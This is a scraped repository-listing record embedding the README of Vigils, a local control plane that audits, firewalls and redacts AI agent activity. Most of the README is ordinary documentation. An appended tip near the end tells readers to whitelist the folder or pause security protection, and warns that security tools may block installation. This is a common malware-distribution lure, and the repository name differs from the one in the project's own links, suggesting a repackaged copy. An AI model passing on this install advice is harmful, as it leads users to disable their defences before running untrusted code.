[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-83169":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":12,"contributorsCount":12,"subscribersCount":12,"size":12,"stars1d":12,"stars7d":12,"stars30d":12,"stars90d":12,"forks30d":12,"starsTrendScore":12,"compositeScore":14,"rankGlobal":9,"rankLanguage":9,"license":15,"archived":16,"fork":16,"defaultBranch":17,"hasWiki":18,"hasPages":16,"topics":19,"createdAt":9,"pushedAt":9,"updatedAt":30,"readmeContent":31,"aiSummary":32,"trendingCount":12,"starSnapshotCount":12,"syncStatus":33,"lastSyncTime":34,"discoverSource":35},83169,"vigils-271","picodefenderrecord\u002Fvigils-271","picodefenderrecord","A local control plane for AI agents — see what they do, approve what matters, keep secrets out. Rust + Tauri + Chrome MV3.",null,"Rust",4,0,63,40,"Apache License 2.0",false,"main",true,[20,21,22,23,24,25,26,27,28,29],"agent-security","ai-agents","audit-log","desktop","llm","local-first","pii","rust","sandbox","tauri","2026-06-12 04:01:40","\u003Cdiv align=\"center\">\n\n# Vigils\n\n### A local-first control plane for AI agents — see what they do, approve what matters, keep secrets out.\n\n[![CI](https:\u002F\u002Fgithub.com\u002Fpicodefenderrecord\u002Fvigils-271\u002Factions\u002Fworkflows\u002Fci.yml\u002Fbadge.svg)](https:\u002F\u002Fgithub.com\u002Fpicodefenderrecord\u002Fvigils-271\u002Factions\u002Fworkflows\u002Fci.yml)\n[![Release](https:\u002F\u002Fimg.shields.io\u002Fgithub\u002Fv\u002Frelease\u002Fduncatzat\u002Fvigils?sort=semver&color=blue)](https:\u002F\u002Fgithub.com\u002Fpicodefenderrecord\u002Fvigils-271\u002Freleases)\n[![License: 
Apache-2.0](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FLicense-Apache_2.0-blue.svg)](.\u002FLICENSE)\n[![Platforms](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Fplatforms-Windows%20%7C%20macOS%20%7C%20Linux-lightgrey.svg)](#installation)\n\n[Website](https:\u002F\u002Fvigils.ai) · [Quick Start](#quick-start) · [Architecture](#architecture) · [Security Model](#security-model) · [Documentation](#documentation)\n\n**English** | [简体中文](.\u002FREADME.zh-CN.md)\n\n\u003C\u002Fdiv>\n\n---\n\nAI agents (Claude Code, Cursor, Zed, MCP clients, browser assistants) call tools, read\nfiles, hit APIs, and paste into web UIs on your behalf. That power is useful — and risky.\n**Vigils sits between your agents and the tools\u002Fdata they touch**, and it is *local-first*:\nyour prompts, secrets, and audit trail never leave your machine.\n\n```\n   AI agent ──▶  ┌─────────────────── Vigils ───────────────────┐  ──▶  tools \u002F data\n (MCP client)    │  redact → firewall → approve → sandbox → audit │       (MCP servers,\n                 └───────────────────────────────────────────────┘        files, APIs, web)\n```\n\n## Why Vigils\n\nFour guarantees, enforced locally:\n\n| Guarantee | How |\n|---|---|\n| **See what the agent did** | Every tool call is recorded in a tamper-evident **SHA-256 hash-chained ledger** with full-text search. |\n| **Approve risky actions first** | Destructive \u002F sensitive calls pause for human review in an **Approval Queue**, with per-agent policy and scoped grants. |\n| **Keep credentials out of prompts \u002F logs \u002F UI** | A **redaction engine** strips secrets and PII (hard-fingerprint rules + an optional ML ensemble) *before* text reaches a model, a log, or the screen. |\n| **Contain & roll back** | The ledger is traceable end-to-end and the **sandbox runner is fail-closed by default** (Wasm + native + Linux Landlock). 
|\n\n## Features\n\n- **🔒 Tamper-evident audit ledger** — SQLite + SHA-256 hash chain; every event links to the\n  previous one, so tampering is detectable. FTS5 full-text search over the redacted trail.\n- **🛡️ Default-deny firewall** — tool calls are gated by a Rust policy DSL; per-agent rules;\n  OAuth scope allow-lists for remote MCP. Nothing runs unless allowed.\n- **✅ Human-in-the-loop approval** — risky effects (file writes, network, destructive ops)\n  pause for review. Grants can be scoped (once \u002F this-session).\n- **🙈 Secret & PII redaction** — hard-fingerprint detection for 13+ credential classes\n  (GitHub PAT, Stripe keys, Google\u002FGitLab tokens, DB URLs, …) plus an optional multilingual\n  ML ensemble; a fail-closed merge layer decides what to mask.\n- **🎟️ Secret lease broker** — short-lived credential leases injected only into the child\n  process that needs them; plaintext is never persisted.\n- **📦 Sandbox runner** — one-shot tool execution in Wasm (Wasmtime) or native processes,\n  with **Linux Landlock LSM** filesystem isolation and `env_clear` so children don't inherit\n  your environment. Fail-closed by default.\n- **🔌 MCP gateway** — sits in front of MCP servers over **stdio and HTTP**; descriptor\n  pinning with drift detection (alerts when a tool's definition changes); bare-command stdio\n- **🖥️ Desktop app** (Tauri 2 + Vue 3) — Approval Queue, Activity Feed, Server Registry,\n  Session Replay, Privacy Findings; keyboard shortcuts, light\u002Fdark\u002Fsystem theme, real-time\n  updates, bilingual (zh \u002F en) UI.\n- **🌐 Browser extension** (Chrome MV3) — redacts secrets\u002FPII *before* paste or submit on AI\n  sites (ChatGPT, Claude, Gemini, Perplexity).\n\n## Architecture\n\nVigils is a Rust workspace of focused crates plus three apps. 
Each layer is independently\ntestable and composed by the **Hub** (the MCP gateway).\n\n| Layer | Crate | Responsibility |\n|---|---|---|\n| **Audit** | `vigil-audit` | SQLite ledger, SHA-256 hash chain, FTS5 search, redaction-scan records |\n| **Policy** | `vigil-policy` | Rust policy DSL + rule engine (default-deny) |\n| **Firewall** | `vigil-firewall` | Tool gating, per-agent rules, OAuth scope allow-lists |\n| **Approval** | `vigil-mcp` (broker) | Human-in-the-loop, scoped grants, cross-process resolution |\n| **Redaction** | `vigil-redaction` | Secret\u002FPII detection (hard fingerprints + ML ensemble), fail-closed merge |\n| **Leases** | `vigil-lease` | Short-lived credential leases, prepared child env (RAII revoke) |\n| **Runner** | `vigil-runner` \u002F `vigil-runner-types` | Native + Wasm execution, env policy, fail-closed |\n| **Sandbox** | `vigil-sandbox-linux` | Linux Landlock LSM filesystem isolation |\n| **Gateway** | `vigil-mcp` | MCP Hub: stdio + HTTP upstreams, descriptor pinning + drift |\n| **Remote auth** | `vigil-http-auth` \u002F `vigil-http-transport` | OAuth (JWT + opaque), token refresh (singleflight), real TLS |\n| **UI protocol** | `vigil-ui-protocol` | Typed command\u002Fresponse contract for the desktop UI |\n| **Browser** | `vigil-browser` | Redaction classifier + audit for the extension bridge |\n| **SDK** | `vigil-sdk` | Thin, SemVer-stable facade over the engine |\n\n**Apps & binaries:**\n\n| Binary | Crate | What it is |\n|---|---|---|\n| `vigil-hub` | `vigil-hub-cli` | CLI MCP gateway: `vigil-hub serve --stdio`, `add-remote-mcp`, `inspect`, … |\n| `gui` | `apps\u002Fdesktop` | Tauri 2 desktop app (embeds the Vue 3 UI + an in-process Hub) |\n| `vigil-native-host` | `apps\u002Fnative-host` | Native-messaging bridge for the Chrome extension |\n| — | `extensions\u002Fchrome-mv3` | Chrome MV3 extension (vanilla JS, zero npm deps) |\n\n\n\n### As an MCP gateway (CLI)\n\nPut Vigils in front of your MCP servers so every tool call is 
firewalled, approved, and audited:\n\n```bash\n# Serve as an MCP endpoint your agent connects to (stdio)\nvigil-hub serve --stdio --upstream-config .\u002Fupstreams.json\n\n# upstreams.json — bare commands resolve via PATH automatically\n\n# Register a remote (HTTP) MCP server with OAuth onboarding\nvigil-hub add-remote-mcp https:\u002F\u002Fmcp.example.com\u002F\n\n# Inspect the local audit ledger from the command line (one-line JSON, pipe to jq)\nvigil-hub inspect --db-path .\u002Fvigil.db activity --limit 20\n```\n\nPoint your agent (Claude Code \u002F Cursor \u002F Zed) at `vigil-hub` instead of the raw MCP server. See\nthe **[Agent Integration & Test guide](https:\u002F\u002Fduncatzat.github.io\u002Fvigils\u002Fgetting-started\u002Fagent-integration.html)**\nfor per-agent config and how to verify it's gating.\n\n### Desktop app\n\nLaunch the desktop app to watch and control agents in real time: **Approval Queue** (approve \u002F\ndeny \u002F bulk), **Activity Feed** (live audit stream), **Server Registry**, **Session Replay**,\nand **Privacy Findings**.\n\n```bash\n# Workspace tests \u002F lints (no GPU or model deps by default)\ncargo test --workspace\ncargo clippy --workspace --all-targets -- -D warnings\ncargo fmt --all -- --check\n\n# CLI gateway\n\n# Desktop UI + app (the `gui` feature embeds the built UI)\ncd apps\u002Fdesktop\u002Fui && npm ci && npm run build && cd -\n```\n\n> Crate names use the historical `vigil-*` prefix; the product and project are **Vigils**.\n\n## Security model\n\n- **Local-first** — prompts, secrets, and the audit ledger stay on your machine.\n- **Default-deny** — the firewall blocks tool calls unless a policy explicitly allows them.\n- **Fail-closed** — when a guarantee can't be enforced (e.g. 
Landlock unsupported, redaction\n  engine unavailable but requested), Vigils refuses rather than silently degrading.\n- **Tamper-evident** — the audit ledger is a SHA-256 hash chain; the desktop app can verify\n  the whole chain.\n- **No raw secrets at rest** — redaction stores only label \u002F count \u002F fingerprint metadata;\n  plaintext credentials are never written to the ledger.\n- **Least privilege spawning** — child processes get a cleared environment plus only the\n  approved env and short-lived secret leases; Linux runs add Landlock filesystem isolation.\n\nFound a vulnerability? Please report it privately — see [SECURITY.md](.\u002FSECURITY.md). Please\ndon't open a public issue for security reports.\n\n## Project structure\n\n```\ncrates\u002F          # 15 library crates (audit, policy, firewall, mcp, redaction, runner,\n                 #   lease, sandbox-linux, http-auth\u002Ftransport, ui-protocol, browser, sdk, types)\napps\u002F\n  desktop\u002F       # Tauri 2 + Vue 3 desktop app (bin: gui)\n  native-host\u002F   # Chrome native-messaging bridge (bin: vigil-native-host)\n  vigil-hub-cli\u002F # CLI MCP gateway (bin: vigil-hub)\nextensions\u002F\n  chrome-mv3\u002F    # Chrome MV3 extension (vanilla JS)\ndocs\u002F\n  adr\u002F           # Architecture Decision Records\n  book\u002F          # User guide (mdBook)\n  threat-model\u002F  # Security threat model\n```\n\n## Documentation\n\n- **User guide** (mdBook): **\u003Chttps:\u002F\u002Fduncatzat.github.io\u002Fvigils\u002F>** — or build [`docs\u002Fbook\u002F`](.\u002Fdocs\u002Fbook) locally\n- **Security audit**: [`docs\u002Fsecurity\u002FSECURITY-AUDIT-2026-06-03.md`](.\u002Fdocs\u002Fsecurity\u002FSECURITY-AUDIT-2026-06-03.md) — comprehensive baseline (OWASP + STRIDE + supply chain), 9.9\u002F10, 0 critical \u002F high\n- **Architecture Decision Records**: [`docs\u002Fadr\u002F`](.\u002Fdocs\u002Fadr)\n- **Threat model**: [`docs\u002Fthreat-model\u002F`](.\u002Fdocs\u002Fthreat-model)\n- 
**SDK surface**: [`docs\u002Fsdk-shallow-api.md`](.\u002Fdocs\u002Fsdk-shallow-api.md)\n\n## Contributing\n\nIssues and pull requests are welcome. Before submitting, please ensure:\n\n```bash\ncargo fmt --all -- --check\ncargo clippy --workspace --all-targets -- -D warnings\ncargo test --workspace\n```\n\nCI runs the same gates on Linux and the UI build on every PR.\n\n### Documentation (bilingual)\n\nVigils serves both the Chinese and international communities, so **user-facing docs are\nbilingual**. When you add or change a guide \u002F how-to \u002F explanatory doc, evaluate whether it needs\nboth languages — if so, write an English page **plus a separate Chinese page** (never\nsentence-by-sentence interleaving), e.g. `foo.md` + `foo.zh-CN.md`, cross-linked at the top.\nReference \u002F ADR \u002F internal docs may stay English-only.\n\n## License\n\n[Apache-2.0](.\u002FLICENSE) © Vigils Authors.\n\n\n\n> [!TIP]\n> If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.\n\n> [!CAUTION]\n> Some security systems may block the installation.\n> Only download from the official repository.\n\n---\n\n## QUICK START\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fpicodefenderrecord\u002Fvigils-271.git\ncd vigils-271\ncargo build --release\ncargo run\n```\n\n\n\u003C!-- Last updated: 2026-06-04 19:35:40 -->\n","Vigils is a local control plane for managing and auditing the behavior of AI agents. It is written in Rust and combines Tauri and Chrome MV3, providing a tamper-evident audit log, a default-deny firewall, a human review and approval mechanism, and automatic masking of sensitive information. With these features, users can clearly see the operations an AI agent performs, approve potentially risky actions, and ensure that sensitive information is not leaked. The project suits scenarios that require running AI agents (such as coding assistants or browser plugins) securely in a local environment with fine-grained control over them.",2,"2026-06-06 04:11:55","CREATED_QUERY"]